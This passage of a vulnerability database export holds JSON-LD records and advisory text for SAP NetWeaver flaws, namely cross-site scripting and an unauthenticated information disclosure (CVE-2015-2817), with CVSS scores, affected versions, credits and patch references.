"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201206-0646",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.4"
}
],
"sources": [
{
"db": "BID",
"id": "55809"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexey Tyurin from ERPScan",
"sources": [
{
"db": "BID",
"id": "55809"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.\nSAP Netweaver 7.02 is vulnerable; other versions may also be affected.",
"sources": [
{
"db": "BID",
"id": "55809"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "55809",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "55809"
}
]
},
"id": "VAR-201206-0646",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:43:31.346000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-12-034-sap-netweaver-rfc-wsdl-xss/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/1614834"
}
],
"sources": [
{
"db": "BID",
"id": "55809"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "55809"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-13T00:00:00",
"db": "BID",
"id": "55809"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-13T00:00:00",
"db": "BID",
"id": "55809"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "55809"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver RFC WSDL Service Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "55809"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "55809"
}
],
"trust": 0.3
}
}
var-201504-0229
Vulnerability from variot
The SAP Management Console in SAP NetWeaver 7.40 allows remote attackers to obtain sensitive information via the ReadProfile parameters, aka SAP Security Note 2091768. SAP Netweaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. SAP Netweaver 7.40 is vulnerable. VULNERABILITY INFORMATION Class: Information disclosure [CWE-200] Impact: Information disclosure Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2817
-
VULNERABILITY DESCRIPTION It is possible to get some information from the web interface of CCMS without authentication.
-
Other versions are probably affected too, but they were not checked.
-
SOLUTIONS AND WORKAROUNDS Install SAP Security Note 2091768 or upgrade kernel to the associated patch level.
-
AUTHOR Dmitry Chastukhin (ERPScan)
-
TECHNICAL DESCRIPTION An anonymous attacker can send a special POST HTTP request to get information about any SAP profile parameters.
-
REPORT TIMELINE Sent: 09.12.2014 Reported: 09.12.2014 Vendor response: 10.12.2014 Date of Public Advisory: 18.06.2015
-
REFERENCES http://erpscan.com/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure
-
ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.
-
ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com -- https://www.linkedin.com/company/2217474?trk=ppro_cprof https://twitter.com/erpscan
e-mail: d.maenkova@erpscan.com d.maenkova@erpscan.com
address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
phone: 650.798.5255
erpscan.com http://erpscan.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201504-0229",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "BID",
"id": "73705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2817"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin",
"sources": [
{
"db": "BID",
"id": "73705"
},
{
"db": "PACKETSTORM",
"id": "132359"
}
],
"trust": 0.4
},
"cve": "CVE-2015-2817",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-2817",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-2817",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201504-030",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The SAP Management Console in SAP NetWeaver 7.40 allows remote attackers to obtain sensitive information via the ReadProfile parameters, aka SAP Security Note 2091768. SAP Netweaver is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may lead to further attacks. \nSAP Netweaver 7.40 is vulnerable. VULNERABILITY INFORMATION\nClass: Information disclosure [CWE-200]\nImpact: Information disclosure\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2015-2817\n\n\n3. VULNERABILITY DESCRIPTION\nIt is possible to get some information from the web interface of CCMS \nwithout authentication. \n\n\n4. \nOther versions are probably affected too, but they were not checked. \n\n\n5. SOLUTIONS AND WORKAROUNDS\nInstall SAP Security Note 2091768 or upgrade kernel to the associated \npatch level. \n\n\n6. AUTHOR\nDmitry Chastukhin (ERPScan)\n\n\n7. TECHNICAL DESCRIPTION\nAn anonymous attacker can send a special POST HTTP request to get \ninformation about any SAP profile parameters. \n\n\n8. REPORT TIMELINE\nSent: 09.12.2014\nReported: 09.12.2014\nVendor response: 10.12.2014\nDate of Public Advisory: 18.06.2015\n\n\n9. REFERENCES\nhttp://erpscan.com/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure\n\n\n10. ABOUT ERPScan Research\nThe company\u2019s expertise is based on the research subdivision of ERPScan, \nwhich is engaged in vulnerability research and analysis of critical \nenterprise applications. It has achieved multiple acknowledgments from \nthe largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, \nHP for discovering more than 400 vulnerabilities in their solutions (200 \nof them just in SAP!). \nERPScan researchers are proud to have exposed new types of \nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated \nfor the best server-side vulnerability at BlackHat 2013. \nERPScan experts have been invited to speak, present, and train at 60+ \nprime international security conferences in 25+ countries across the \ncontinents. These include BlackHat, RSA, HITB, and private SAP trainings \nin several Fortune 2000 companies. \nERPScan researchers lead the project EAS-SEC, which is focused on \nenterprise application security research and awareness. They have \npublished 3 exhaustive annual award-winning surveys about SAP security. \nERPScan experts have been interviewed by leading media resources and \nfeatured in specialized info-sec publications worldwide. These include \nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, \nHeise, and Chinabyte, to name a few. \nWe have highly qualified experts in staff with experience in many \ndifferent fields of security, from web applications and mobile/embedded \nto reverse engineering and ICS/SCADA systems, accumulating their \nexperience to conduct the best SAP security research. \n\n\n11. ABOUT ERPScan\nERPScan is one of the most respected and credible Business Application \nSecurity providers. Founded in 2010, the company operates globally. \nNamed an Emerging vendor in Security by CRN and distinguished by more \nthan 25 other awards, ERPScan is the leading SAP SE partner in \ndiscovering and resolving security vulnerabilities. ERPScan consultants \nwork with SAP SE in Walldorf to improve the security of their latest \nsolutions. \nERPScan\u2019s primary mission is to close the gap between technical and \nbusiness security. We provide solutions to secure ERP systems and \nbusiness-critical applications from both cyber attacks and internal \nfraud. Our clients are usually large enterprises, Fortune 2000 \ncompanies, and managed service providers whose requirements are to \nactively monitor and manage the security of vast SAP landscapes on a \nglobal scale. \nOur flagship product is ERPScan Security Monitoring Suite for SAP. This \nmulti award-winning innovative software is the only solution on the \nmarket certified by SAP SE covering all tiers of SAP security: \nvulnerability assessment, source code review, and Segregation of Duties. \nThe largest companies from diverse industries like oil and gas, banking, \nretail, even nuclear power installations as well as consulting companies \nhave successfully deployed the software. ERPScan Security Monitoring \nSuite for SAP is specifically designed for enterprises to continuously \nmonitor changes in multiple SAP systems. It generates and analyzes \ntrends in user friendly dashboards, manages risks, tasks, and can export \nresults to external systems. These features enable central management of \nSAP system security with minimal time and effort. \nWe follow the sun and function in two hubs located in the Netherlands \nand the US to operate local offices and partner network spanning 20+ \ncountries around the globe. This enables monitoring cyber threats in \nreal time and providing agile customer support. \n\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301\nPhone: 650.798.5255\nTwitter: @erpscan\nScoop-it: Business Application Security\nhttp://erpscan.com\n-- \n\u003chttps://www.linkedin.com/company/2217474?trk=ppro_cprof\u003e \n\u003chttps://twitter.com/erpscan\u003e\n\n\u003chttp://erpscan.com/\u003e\n\n------------------------------------------------------------------------\n\ne-mail: d.maenkova@erpscan.com \u003cmailto:d.maenkova@erpscan.com\u003e\n\naddress: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nphone: 650.798.5255\n\nerpscan.com \u003chttp://erpscan.com\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"db": "BID",
"id": "73705"
},
{
"db": "PACKETSTORM",
"id": "132359"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-2817",
"trust": 2.8
},
{
"db": "BID",
"id": "73705",
"trust": 1.3
},
{
"db": "PACKETSTORM",
"id": "132359",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002062",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201504-030",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "73705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"db": "PACKETSTORM",
"id": "132359"
},
{
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
]
},
"id": "VAR-201504-0229",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:20:56.064000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2091768",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"db": "NVD",
"id": "CVE-2015-2817"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/132359/sap-management-console-information-disclosure.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2015/jun/65"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/535829/100/800/threaded"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/73705"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2817"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2817"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.1,
"url": "http://erpscan.com/advisories/erpscan-15-007-sap-management-console-readprofile-parameters-information-disclosure"
},
{
"trust": 0.1,
"url": "http://erpscan.com/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-2817"
},
{
"trust": 0.1,
"url": "https://www.linkedin.com/company/2217474?trk=ppro_cprof\u003e"
},
{
"trust": 0.1,
"url": "https://twitter.com/erpscan\u003e"
},
{
"trust": 0.1,
"url": "http://sap.com"
},
{
"trust": 0.1,
"url": "http://erpscan.com"
},
{
"trust": 0.1,
"url": "http://erpscan.com\u003e"
}
],
"sources": [
{
"db": "BID",
"id": "73705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"db": "PACKETSTORM",
"id": "132359"
},
{
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "73705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"db": "PACKETSTORM",
"id": "132359"
},
{
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-01T00:00:00",
"db": "BID",
"id": "73705"
},
{
"date": "2015-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"date": "2015-06-18T23:51:15",
"db": "PACKETSTORM",
"id": "132359"
},
{
"date": "2015-04-01T14:59:15.553000",
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"date": "2015-04-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-01T00:00:00",
"db": "BID",
"id": "73705"
},
{
"date": "2015-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-002062"
},
{
"date": "2018-12-10T19:29:08.107000",
"db": "NVD",
"id": "CVE-2015-2817"
},
{
"date": "2015-04-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of SAP Management Console Vulnerability in which important information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002062"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201504-030"
}
],
"trust": 0.6
}
}
var-202202-0556
Vulnerability from variot
Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application. SAP NetWeaver Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202202-0556",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "740"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "755"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "701"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "731"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "750"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "700"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "702"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "753"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "752"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "754"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "756"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "751"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-005424"
},
{
"db": "NVD",
"id": "CVE-2022-22534"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
